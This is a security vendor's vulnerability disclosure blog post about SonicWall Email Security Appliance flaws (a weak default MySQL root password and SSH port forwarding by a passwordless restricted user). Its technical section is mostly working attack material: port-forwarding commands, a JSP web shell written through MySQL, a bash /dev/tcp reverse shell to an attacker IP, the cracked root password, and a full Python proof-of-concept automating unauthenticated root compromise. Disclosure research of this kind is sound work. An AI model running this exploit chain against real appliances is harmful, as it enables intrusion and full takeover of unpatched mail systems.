Research & Intelligence

SonicWall Email Security Appliance Vulnerabilities Could Allow Remote Code Execution

By leveraging a weak password and the ability to forward ports, an unauthenticated attacker could remotely execute code on systems running SonicWall Email Security Appliance versions through 10.0.2.

SonicWall Email Security Appliance Vulnerabilities Could Allow Remote Code Execution

Summary

A Secureworks® assessment of a customer’s environment led to the discovery of two vulnerabilities in the SonicWall Email Security Appliance: a weak default root MySQL password (CVE-2019-7488) and a flaw that allows a restricted SSH (Secure Shell) user without a password to forward ports (CVE-2019-7489). When combined, these vulnerabilities led to unauthenticated remote code execution and a full system compromise.

Technical details

Analysis of the customer’s network revealed a SonicWall Email Security Appliance (see Figure 1).


Figure 1. SonicWall Email Security Appliance login. (Source: Secureworks)

Initial scans showed that SSH was available on the server. An attempt to authenticate to the SSH service generated a prompt to login as “snwlcli user”:

$ ssh [email protected]
For CLI access you must login as snwlcli user.
[email protected]'s password:

Attempting to authenticate to the SSH session using the ’snwlcli‘ user generated an additional login prompt:

$ ssh [email protected]
For CLI access you must login as snwlcli user.
Terminal type not supported; setting to ansi
Login:

To better understand the ‘snwlcli’ user and the authentication process, the Secureworks analyst downloaded the same version of the virtual appliance from the SonicWall website. They then added the virtual hard drive (VMDK file) to an existing Kali Linux virtual machine to view the files contained on the hard drive and mount additional .img files that were located there.

The files appeared to be part of a fairly standard Linux image. The ’/etc/passwd‘ and ’/etc/shadow‘ files indicated that the ‘snwlcli’ user lacks an SSH password and has a non-standard shell that is actually a script that calls a binary:

# cat passwd shadow | grep snwlcli
snwlcli:x:1001:1001::/home/default:/opt/vsa/bin/snwlcli.sh
snwlcli::12605:0:::::

Although missing libraries and other components prevented the binary from being executed from the mounted image, analysis revealed that ‘snwlcli’ was a valid SSH user without a password and that the binary was performing the authentication. This realization led to questions about whether other SSH features such as SSH forwarding were available.

Knowing that MySQL was installed, the analyst attempted to forward a local port from their system (as the “attacker”) to the remote MySQL port on the customer’s (“victim’s”) SonicWall Email Security Appliance and was successful:

$ ssh -L13306:127.0.0.1:3306 [email protected]
For CLI access you must login as snwlcli user.
Terminal type not supported; setting to ansi
Login:

The “attacker” system was now connected to the MySQL server, as the port forwarding made the system appear local. This connection included access to the MySQL database as a low-privileged anonymous user.

$ mysql -h 127.0.0.1 -P 13306
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5618
Server version: 5.5.52-MariaDB MariaDB Server

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select @@hostname;
+------------------+
| @@hostname       |
+------------------+
| snwl.example.com |
+------------------+
1 row in set (0.00 sec)

The analyst located the MySQL user table (user.MYD) on the downloaded and mounted appliance virtual hard drive and dumped the hashes via the strings command. These hashes were then submitted to a purpose-built password cracking server to obtain the root password:

# strings user.MYD
localhost
esuser*D68FF9798076AF80F5261ADC1E825E7652D41678
root*BD341544E67ED19C9E7E6CD9758831ABFC2601D1

The analyst then used the MySQL root credentials to write a simple JSP web shell to one of the web directories:

MariaDB [(none)]> select "<% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>" into outfile "/opt/tomcat/webapps/SearchEngineRMIService/sw.jsp"

The JSP web shell provided blind command execution. The analyst was unable to directly execute any standard reverse shell commands but was eventually able to obtain a reverse shell by writing a second script to disk using MySQL:

MariaDB [(none)]> select "/bin/bash -i >& /dev/tcp/192.168.56.1/80 0>&1" into outfile "/opt/tomcat/temp/r1.sh";

The analyst then executed this script using the original command shell:

$ curl http://192.168.56.77/SearchEngineRMIService/sw.jsp?cmd=sh+/opt/tomcat/temp/r1.sh

The resulting reverse shell provided full root access to the appliance:

$ ncat -lvp 80
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 192.168.56.77.
Ncat: Connection from 192.168.56.77:49368.
bash-4.1# id
id
uid=0(root) gid=0(root)

Proof-of-concept exploit

The following code is the full proof-of-concept exploit:

#!/usr/bin/env python3
### This script automates unauthenticated remote code execution on SonicWall Email Security Appliances version 10.0.2 using CVE-2019-7488 and CVE-2019-7499
### You must listen with a netcat listener, and the script will do the rest. It may take a couple seconds to run.
### Vulnerability discovered and POC developed by Nevada Romsdahl
import sys
import subprocess
import requests
import time
import mysql.connector

def forward_ports(target):
    print("[+] Forwarding MySQL and HTTP ports via SSH, ignore the login prompt that will appear")
    subprocess.Popen(f"ssh -L13306:127.0.0.1:3306 snwlcli@{target}", shell=True)
    time.sleep(3)
    subprocess.Popen(f"ssh -L13080:127.0.0.1:80 snwlcli@{target}", shell=True)
    time.sleep(3)

def write_shells(lhost, lport, fname):
    mydb = mysql.connector.connect(
        host="127.0.0.1",
        user="root",
        password="sonic@11",
        port=13306
    )
    mycursor = mydb.cursor()
    print("[+] Writing command shell to the web directory")
    mycursor.execute(
        f'select "<% Runtime.getRuntime().exec(request.getParameter(\\"cmd\\")); %>" into outfile "/opt/tomcat/webapps/SearchEngineRMIService/{fname}.jsp"'
    )
    print("[+] Writing reverse shell to the temp directory")
    mycursor.execute(
        f'select "/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1" into outfile "/opt/tomcat/temp/{fname}.sh";')

def execute_shell(fname):
       print("[+] Executing the reverse shell")
       command_url = 
f'http://127.0.0.1:13080/SearchEngineRMIService/{fname}.jsp?cmd=sh+/opt/tomcat/temp/{fname}.sh'
    r = requests.get(url=command_url)
    print("\n[+] Check your listener, you should have a shell.\n")

def main():
    if len(sys.argv) != 4:
        print(" ")
        print(f"Usage: {sys.argv[0]} <target> <host to connect back to> <port to connect back to>")
        print(f"Example: {sys.argv[0]} 192.168.2.3 192.168.2.1 4444")
        print("Open a netcat listener before running this script")
        print(" ")
        sys.exit(1)
target = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] fname = time.strftime("%Y%m%d-%H%M%S")
forward_ports(target) write_shells(lhost, lport, fname) execute_shell(fname)

if __name__ == "__main__":
    main()

Conclusion

The discovery of these issues revealed a combination of vulnerabilities that attackers could exploit to execute remote code on vulnerable systems. After Secureworks privately disclosed the issues to the vendor, SonicWall addressed them in Email Security Appliance 10.0.3. Organizations running earlier versions should upgrade as appropriate in their environments.

Back to all Blogs

Additional Resources

TRY TAEGIS TODAY!

See for yourself: Request your demo to see how Taegis can reduce risk, optimize existing security investments, and fill talent gaps.